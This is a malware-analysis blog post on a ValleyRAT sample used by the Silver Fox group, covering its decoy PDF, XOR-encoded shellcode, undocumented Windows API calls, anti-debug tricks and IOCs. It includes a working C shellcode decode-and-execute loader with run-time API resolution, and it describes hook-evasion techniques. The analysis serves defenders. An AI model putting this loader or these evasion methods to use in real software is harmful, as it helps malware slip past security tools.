Thursday, February 20, 2025

APT Silver Fox is using a stock investment decoy and undocumented Windows API functions to evade detection

 

Summary

ValleyRAT is a remote access Trojan used by the Silver Fox threat group. While threat hunting I found many samples; this post analyzes just one of them.

 

 

Technical analysis

ValleyRAT md5: 6923AB76F93C6D48B025D27A37E20D14
File type: Portable executable for 80386 (PE), i.e. a 32-bit x86 dropper

Figure1-basic info

Release malware and decoy

ValleyRAT drops two files into “%LocalAppData%\Temp\”: the second-stage Trojan “moomoo x64.exe” and the decoy UUD.pdf. It then opens UUD.pdf in a browser (msedge.exe, Microsoft Edge) to hold the victim's attention and cover its real purpose; the PDF is written in Japanese and explains how to invest in the stock market, which suggests the attacker is after a specific group of potential victims. In the background it starts “moomoo x64.exe” as a separate process.

Figure2-Stock market guide

 

 

The traffic between client and server

While “moomoo x64.exe” (md5: 11B499CC40D08A10C107A6FB55A31B65) runs in the background, the client tries to connect to the server at 104[.]219[.]214[.]206:8008. It sends a TCP SYN and gets an RST/ACK back, so the server was no longer accepting connections on that port at the time of analysis.

Figure3-The traffic between client and server

 

Dive deep inside

The connection attempt comes from shellcode embedded in “moomoo x64.exe”. The encoded shellcode lives in the global variable byte_479040 and is decoded by XORing every byte with the constant 0xA7. The decoded bytes are copied to a buffer starting at address 0x000000000030E400; the blob ends with the special byte 0xA7 (a byte equal to the key, which decodes to 0x00) and its length is 0x256D1 (153,297) bytes. The buffer's protection is then changed with VirtualProtect and execution is transferred into it with the instruction “call r13”; the shellcode runs until it has loaded rasadhlp.dll.

Figure4-Xor and execute the shellcode

Figure5-the shellcode snippet in memory

 

Lower-level undocumented Windows API functions

 

Moving to the entry point of rasadhlp.dll, there is a new find: LdrResFindResourceDirectory, an internal ntdll.dll function used by the Windows loader to locate and retrieve resource directories within a Portable Executable (PE) image.

 

ZwProtectVirtualMemory (also exported as NtProtectVirtualMemory) is the Windows Native API function that changes the protection of a region of virtual memory in a process. It is the system call behind VirtualProtect, so calling it directly skips the kernel32/kernelbase layer where user-mode security hooks are usually placed.

 

The IP address 104[.]219[.]214[.]206 is embedded in the sample and is decrypted in memory only after this call. LdrLoadDll is an undocumented ntdll.dll function that loads a DLL into the process address space; it is the routine LoadLibrary ultimately calls, so using it directly keeps LoadLibrary out of the import table and away from hooks placed on it.

Figure5.1-IP address

 

WSAttemptAutodialName is an undocumented Winsock helper exported by rasadhlp.dll; it attempts to trigger a RAS autodial connection for the given network name. Other undocumented helpers appear as well (e.g., WSNoteSuccessfulHostentLookup and WahReferenceContextByHandle). These belong to the normal Winsock autodial path and are not an indicator of malice on their own.

Figure5.2-connect to C2 


Policy and Evasion

The code resolves the addresses of critical Windows API functions at run time (e.g., LoadLibraryA, VirtualProtect, CreateFiber, SwitchToFiber) instead of importing them, so the import table and string set reveal little to antivirus or static analysis tools. It loads the DLLs it needs (activeds.dll, user32.dll) into the process address space itself, and VirtualProtect is used for memory manipulation, such as changing a buffer's page permissions before executing it.

Figure6-The code of policy and evasion
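The decode-and-stage sequence described in “Dive deep inside” (XOR of byte_479040 with 0xA7, a 0xA7 marker at the end, VirtualProtect, then `call r13`) together with the run-time API resolution described in this section, as one added example in C. This is illustrative code written for this post, not code from the sample or from Silver Fox tooling. Assumptions: a constructed six-byte stub stands in for the real shellcode; the post reports both a length (0x256D1) and a trailing 0xA7 but does not show which one stops the copy loop, so the decoder takes the length and validates the marker; VirtualProtect is looked up with GetProcAddress on Windows only, and on other platforms the staging step is skipped and only the decoder runs.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* XOR key used on byte_479040. A byte equal to the key decodes to 0x00,
 * which is why the encoded blob ends with 0xA7. */
#define XOR_KEY 0xA7u

/* Decode `len` bytes of `enc` into `out` (capacity `cap`). Trusts the
 * reported length and validates the trailing marker. Returns the decoded
 * length, or 0 if the marker is missing or the stage buffer is too small. */
size_t xor_decode(const uint8_t *enc, size_t len, uint8_t *out, size_t cap)
{
    if (len == 0 || len > cap || enc[len - 1] != XOR_KEY)
        return 0;
    for (size_t i = 0; i < len; i++)
        out[i] = enc[i] ^ XOR_KEY;      /* out[len - 1] becomes 0x00 */
    return len;
}

/* Constructed stand-in for the real shellcode (NOT the sample's bytes):
 * x64 "mov eax, 42 ; ret". */
static const uint8_t kPlain[] = { 0xB8, 0x2A, 0x00, 0x00, 0x00, 0xC3 };

/* Produce the stored layout: each byte XORed with the key, then the marker. */
size_t build_blob(const uint8_t *plain, size_t n, uint8_t *blob, size_t cap)
{
    if (n + 1 > cap)
        return 0;
    for (size_t i = 0; i < n; i++)
        blob[i] = plain[i] ^ XOR_KEY;
    blob[n] = XOR_KEY;
    return n + 1;
}

typedef int (*stage_fn)(void);

/* Stage and run a decoded buffer the way the post describes: fresh RW
 * memory, VirtualProtect to RX, then transfer control (the `call r13`).
 * VirtualProtect is resolved with GetProcAddress rather than imported, as in
 * Figure6. Windows-only; elsewhere it returns -1. */
int stage_and_run(const uint8_t *code, size_t n)
{
#ifdef _WIN32
    typedef BOOL (WINAPI *VP_t)(LPVOID, SIZE_T, DWORD, PDWORD);
    VP_t pVirtualProtect = (VP_t)(void *)GetProcAddress(
        GetModuleHandleA("kernel32.dll"), "VirtualProtect");
    if (!pVirtualProtect)
        return -1;
    void *mem = VirtualAlloc(NULL, n, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    DWORD old = 0;
    if (!mem)
        return -1;
    memcpy(mem, code, n);
    int rc = -1;
    if (pVirtualProtect(mem, n, PAGE_EXECUTE_READ, &old))
        rc = ((stage_fn)mem)();
    VirtualFree(mem, 0, MEM_RELEASE);
    return rc;
#else
    (void)code; (void)n;
    return -1;
#endif
}

/* Round trip on the constructed blob, plus a blob without the marker, which
 * must be rejected. Returns 1 when everything checks out. */
int demo_decode_ok(void)
{
    uint8_t blob[16], out[16], tmp[16];
    const uint8_t bad[2] = { 0x01, 0x02 };
    size_t blen = build_blob(kPlain, sizeof kPlain, blob, sizeof blob);
    size_t n = xor_decode(blob, blen, out, sizeof out);
    return n == sizeof kPlain + 1
        && memcmp(out, kPlain, sizeof kPlain) == 0
        && out[n - 1] == 0x00
        && xor_decode(bad, sizeof bad, tmp, sizeof tmp) == 0;
}

int main(void)
{
    uint8_t blob[16], out[16];
    size_t n = xor_decode(blob, build_blob(kPlain, sizeof kPlain, blob, sizeof blob),
                          out, sizeof out);
    printf("decode ok: %d, %zu bytes; stage_and_run -> %d (42 on Windows)\n",
           demo_decode_ok(), n, stage_and_run(out, n));
    return 0;
}
```

The same staging path with ZwProtectVirtualMemory resolved from ntdll.dll instead of VirtualProtect from kernel32.dll is the variant the shellcode itself uses, and the reason user-mode hooks on VirtualProtect alone do not see the RW-to-RX flip.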


The loop sleeps for 1 second per iteration and runs 10 times, for a total delay of 10 seconds. This is a deliberate execution delay: a simple anti-analysis trick that wastes a reverse engineer's time when stepping through, and that can also outlast the execution budget of an automated sandbox so that no malicious behaviour is observed.

Figure7-A simple anti-debug technique

 

To hinder debugging, several exit calls are planted in the control flow as traps. An analyst who wants more detail only needs to patch or step around them; it is not complicated.

Figure8-Logic trap for anti-debug

 

IsDebuggerPresent is a Windows API function that reports whether a user-mode debugger is attached to the calling process. It just returns the BeingDebugged byte from the PEB, so it is trivially defeated by clearing that byte or patching the call.

Figure9-anti-debug

 

 

Generate a pseudo-random value

An interesting detail is that the code generates a unique, pseudo-random value from system information, combining the system time, process ID, thread ID, tick count and performance counter. qword_4B37F0 is a global variable initialised to 0x2B992DDFA232; if it still holds that initial value, the code generates a new one. The collected values are combined with XOR and the result is masked with 0xFFFFFFFFFFFF so that it fits in 48 bits. Note that XORing correlated, low-entropy sources is not cryptographic randomness; the value serves as a per-host or per-run identifier, not as key material.

Figure10-Generate a pseudo-random value

 

 

Unknown thing

Some URL strings embedded in the sample (baidu, google, wikipedia, digicert and its OCSP responder) appear to be unused; the malware clears all of them before it finishes. Their purpose is not clear from this sample.

Figure11- Unused URL strings

 

 

IOCs

ValleyRAT md5: 6923AB76F93C6D48B025D27A37E20D14

moomoo x64.exe md5: 11b499cc40d08a10c107a6fb55a31b65

UUD.pdf md5: C4FD1E5F9DF850878E7B770F50031FD2

104[.]219[.]214[.]206

hxxps[:]//www[.]baidu[.]com/

hxxps[:]//www[.]google[.]com/

hxxps[:]//www[.]wikipedia[.]org/

hxxp[:]//www[.]digicert[.]com

hxxp[:]//ocsp[.]digicert[.]com

C:/program/12530/do.txt

Note on the URL entries above: the baidu, google, wikipedia and digicert addresses are strings embedded in the binary that appear never to be used (see Figure11), and they are legitimate domains. They are listed because they are present in the sample, not as C2; do not block or alert on them.

 

Conclusion


ValleyRAT drops both the Trojan “moomoo x64.exe” and the decoy UUD.pdf; the PDF is opened in a browser to hold the victim's attention and cover the real aim, while “moomoo x64.exe” runs in the background and tries to reach the C2 server. The shellcode embedded in that binary is decrypted with a simple XOR, resolves its APIs at run time, loads the DLLs it needs itself, and relies on undocumented native API functions and memory-permission changes to hinder debugging and bypass some antivirus products. It remains a threat that deserves more attention.

End.


Support My Work:

**If you found this report helpful, consider supporting my work by buying me a coffee!** Your contribution helps me dedicate more time to malware analysis and creating free resources for the cybersecurity community.  



[Alipay QR code image] Alipay



*I am deeply grateful from the bottom of my heart!*
